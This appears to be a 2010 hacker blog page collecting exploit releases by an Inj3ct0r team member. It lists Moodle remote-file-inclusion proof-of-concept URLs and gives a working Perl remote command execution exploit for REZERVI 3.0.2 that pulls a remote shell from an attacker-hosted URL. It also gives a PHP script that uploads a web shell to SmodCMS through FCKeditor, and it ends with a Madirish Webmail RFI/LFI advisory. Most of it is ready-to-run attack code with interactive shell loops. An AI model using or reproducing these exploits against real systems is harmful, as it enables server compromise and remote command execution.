(moodle/course/recent_form.php)
(moodle/course/moodleform_mod.php)
(moodle/course/reset_form.php)
(moodle/course/delete_category_form.php)
(moodle/course/request_form.php)
(moodle/grade/edit/letter/edit_form.php)
(moodle/grade/edit/outcome/edit_form.php)
(moodle/grade/edit/scale/edit_form.php)
(moodle/grade/edit/settings/form.php)
(moodle/grade/edit/tree/category_form.php)
(moodle/grade/edit/tree/outcomeitem_form.php)
(moodle/grade/edit/tree/calculation_form.php)
(moodle/grade/edit/tree/grade_form.php)
(moodle/grade/export/grade_export_form.php)
(moodle/grade/import/grade_import_form.php)
(moodle/login/signup_form.php)
(moodle/login/change_password_form.php)
(moodle/login/restored_password_form.php)
(moodle/mod/forum/post_form.php)
(moodle/mod/glossary/comment_form.php)
(moodle/notes/edit_form.php)
(moodle/question/contextmove_form.php)
(moodle/question/move_form.php)
(moodle/question/category_form.php)
(moodle/question/contextmoveq_form.php)
(moodle/question/export_form.php)
(moodle/question/import_form.php)

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/admin/uploaduser_form.php?libdir=
http://127.0.0.1/moodle/admin/uploadpicture_form.php?libdir=
http://127.0.0.1/moodle/blog/edit_form.php
http://127.0.0.1/moodle/course/edit_form.php
http://127.0.0.1/moodle/course/recent_form.php
http://127.0.0.1/moodle/course/moodleform_mod.php
http://127.0.0.1/moodle/course/reset_form.php
http://127.0.0.1/moodle/course/delete_category_form.php
http://127.0.0.1/moodle/course/request_form.php
http://127.0.0.1/moodle/grade/edit/letter/edit_form.php
http://127.0.0.1/moodle/grade/edit/outcome/edit_form.php
http://127.0.0.1/moodle/grade/edit/scale/edit_form.php
http://127.0.0.1/moodle/grade/edit/settings/form.php
http://127.0.0.1/moodle/grade/edit/tree/category_form.php
http://127.0.0.1/moodle/grade/edit/tree/outcomeitem_form.php
http://127.0.0.1/moodle/grade/edit/tree/calculation_form.php
http://127.0.0.1/moodle/grade/edit/tree/grade_form.php
http://127.0.0.1/moodle/grade/export/grade_export_form.php
http://127.0.0.1/moodle/grade/import/grade_import_form.php
http://127.0.0.1/moodle/login/signup_form.php
http://127.0.0.1/moodle/login/change_password_form.php
http://127.0.0.1/moodle/login/restored_password_form.php
http://127.0.0.1/moodle/mod/forum/post_form.php
http://127.0.0.1/moodle/mod/glossary/comment_form.php
http://127.0.0.1/moodle/notes/edit_form.php
http://127.0.0.1/moodle/question/contextmove_form.php
http://127.0.0.1/moodle/question/move_form.php
http://127.0.0.1/moodle/question/category_form.php
http://127.0.0.1/moodle/question/contextmoveq_form.php
http://127.0.0.1/moodle/question/export_form.php
http://127.0.0.1/moodle/question/import_form.php

########################################################

-=[ Other Vuln C0de ]=-

[-] moodle/lib/textlib.class.php

/// Required files
require_once($CFG->libdir.'/typo3/class.t3lib_cs.php'); // line 28
require_once($CFG->libdir.'/typo3/class.t3lib_div.php'); // line 29

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/lib/textlib.class.php?libdir= [inj3ct0r shell]

########################################################
[-] moodle/group/group_form.php

require_once($CFG->dirroot.'/lib/formslib.php'); // line 3

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/group/group_form.php?dirroot= [inj3ct0r shell]

########################################################

-=[ Other Vuln C0de ]=-


[-] moodle/my/pagelib.php

require_once($CFG->libdir.'/pagelib.php'); // line 3

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/my/pagelib.php?libdir= [sh3ll inj3ct0r]

########################################################

-=[ Other Vuln C0de ]=-

[-] /moodle/tag/pagelib.php


require_once($CFG->libdir.'/pagelib.php'); // line 3
require_once('lib.php');

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/tag/pagelib.php?libdir= [inj3ct0r sh3ll]

########################################################

[-] moodle/course/editcategory_form.php

require_once ($CFG->dirroot.'/course/moodleform_mod.php'); // line 2

*********************** -=[P0C]=- ***********************

http://127.0.0.1/moodle/course/editcategory_form.php?dirroot= [sh3ll inj3ct0r]

*********************** etc, etc, etc, ***********************

####################=[E0F]=####################

2010/05/07

REZERVI 3.0.2 Remote Command Execution Exploit




#!/usr/bin/perl
####################################################################
# REZERVI 3.0.2 Remote Command Execution Exploit
# download: http://www.rezervi.com/downloads/rezervi3_0_2.zip
#
# Author: JosS & Randy Arios a.k.a eidelweiss
# mail: eidelweiss[at]cyberservices[dot]com
# blog: http://eidelweiss-advisories.blogspot.com
# Greetz: Inj3ct0r Team - YOGYACARDERLINK - devilzc0de - JosS [hack0wn] - exploit-db team
#
# INDONESIAN HACKER still R0CK!!
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
####################################################################
# OUTPUT: (tested on localhost)
#
# [shell]:~$ id
# uid=80(apache) gid=80(apache) groups=80(apache)
# [shell]:~$ uname -a
# Linux localhost 2.6.29-grsec #2 SMP Fri Aug 14 21:37:03 PDT 2009 i686 GNU/Linux
# [shell]:~$ exit
# localhost:/home/eidelweiss/Desktop#


use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}

&clear();

sub banner {
&clear();
print "[x] REZERVI 3.0.2 Remote Command Execution Exploit\n";
print "[x] Written By eidelweiss\n";
print "[x] eidelweiss[at]cyberservices[dot]com\n\n";
print "[+] Usage:\n";
print "[+] $0 -vuln \"web+path\" -shell \"shell\"\n";
print "[+] eX: $0 -vuln \"http://localhost/PATH/\" -shell \"http://yourweb/inj3ct0r/sh3ll.txt?\"\n\n";
exit();
}

my $options = GetOptions (
'help!' => \$help,
'vuln=s' => \$vuln,
'shell=s' => \$shell
);

&banner unless ($vuln);
&banner unless ($shell);

&banner if $banner eq 1;

chomp($vuln);
chomp($shell);

while (){

print "[shell]:~\$ ";
chomp($cmd=);

if ($cmd eq "exit" || $cmd eq "quit") {
exit 0;
}

my $ua = LWP::UserAgent->new;
$iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
chomp($iny);
my $own = $vuln . "/rezervi/include/mail.inc.php?root=" . $shell . $iny;
chomp($own);
my $req = HTTP::Request->new(GET => $own);
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success){
print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
}
else
{
print "[p0c] Exploit failed\n";
exit(1);
}
}

# __E0F__

2010/05/01

Google Chrome 4.1.249.1064 Remote Memory Corrupt (Local Crash Exploit)






2010/04/25

SmodCMS v.4.07 (fckeditor) Remote Arbitrary File Upload Exploit





/*
-----------------------------------------------------------------
SmodCMS v.4.07 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Developers: www.smod.pl
Download : http://smod.pl/pliki/smodcms407.zip
exploited by ..: eidelweiss
Special thanks to all my friends who helped and support me when i sick
details..: works with an Apache server with the mod_mime module installed (if specific)

[-] vulnerable code in path/fckeditor/editor/filemanager/connectors/php/config.php

[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/userfiles/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*] // What the user can do with this connector.
[*] $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;

with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/

*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;

$connector = "/fckeditor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");

foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";

$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "\r\n";
$data .= "--abcdef--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;

preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);

if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");

$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;

sleep(1);
}

return false;
}
print "\n+-------------------------------------------------------------------------------+";
print "\n| SmodCMS v.4.07 (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+-------------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /SmodCMS/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed You are not lucky...\n");
else print "\n[-] Shell uploaded in progress...!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\SmodCMS-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed You are not lucky...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>

Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability




=====================================================
Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
=====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Download: http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_Webmail.tgz/download

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) And All Friends.

Successful exploitation requires that "register_globals" is enabled.

========================================================================

Description:

Madirish Webmail is a PHP based email agent (with an Address Book and Calendar) primarily used to access a POP3 account via the web.
The system uses MySQL and PHP, and while developed for Linux, will probably work on other platforms.

========================================================================

-=[ VULN C0de ]=-

There is a vulnerability in almost every file directory , for example in this Directory file:

[-] Madirish_Webmail/lib/addressbook.php

*/
require_once($basedir."lib/sql.php");
require_once($basedir."lib/html.php");

*************************************************
[!]This other sample vuln c0de which affected to LFI [!]
*************************************************

[-] Madirish_Webmail/index.php

*/
require_once ("inc/config.php"); //<= 1
require_once ($basedir."lib/html.php");
require_once ($basedir."lib/common.php"); //<=2
========================================================================

-=[ P0C RFI ]=-

http://127.0.0.1/Madirish_Webmail/lib/addressbook.php?basedir= [sh3ll inj3ct0r]

-=[ P0C LFI ]=-

http://127.0.0.1/Madirish_Webmail/index.php?basedir= [LFI]

etc, etc, etc

========================================================================

NB:
There is a vulnerability in almost every file directory of Madirish Webmail v2.01.
Vendor fix the vulnerability in version 2.0 and update to v2.0.1
But vendor not perfectly fix the vulnerability , they just edit the code to handle Remote file inclusions,
but as we see still have RFI vulnerability and now i see possible LFI there.

Solution: Fix / Edit the code or update to new version if available, Example:

*/
require_once($basedir."lib/sql.php"); // change into require_once("Madirish_Webmail/lib/sql.php");
require_once($basedir."lib/html.php"); // change into require_once("Madirish_Webmail/lib/html.php");

=========================| -=[ E0F ]=- |=================================